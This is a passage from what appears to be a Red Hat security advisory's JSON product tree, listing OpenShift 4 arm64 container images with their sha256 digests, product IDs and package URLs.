"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cloud-controller-manager-rhel9@sha256%3A6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557318"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cluster-api-controllers-rhel9@sha256%3Aae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9@sha256%3Ade7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9-operator@sha256%3A67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-pod-identity-webhook-rhel9@sha256%3A240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557257"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-controller-manager-rhel9@sha256%3A2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557692"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cloud-node-manager-rhel9@sha256%3Adeb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-cluster-api-controllers-rhel9@sha256%3Ad665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602036"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9@sha256%3Ab13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-disk-csi-driver-rhel9-operator@sha256%3A086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557684"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3Adcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-workload-identity-webhook-rhel9@sha256%3A834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3Aa9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3A572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3Aa400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3Aa1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3Ac8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Acd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3Ab28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3A4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3Acfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3Ae0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"product_identification_helper": {
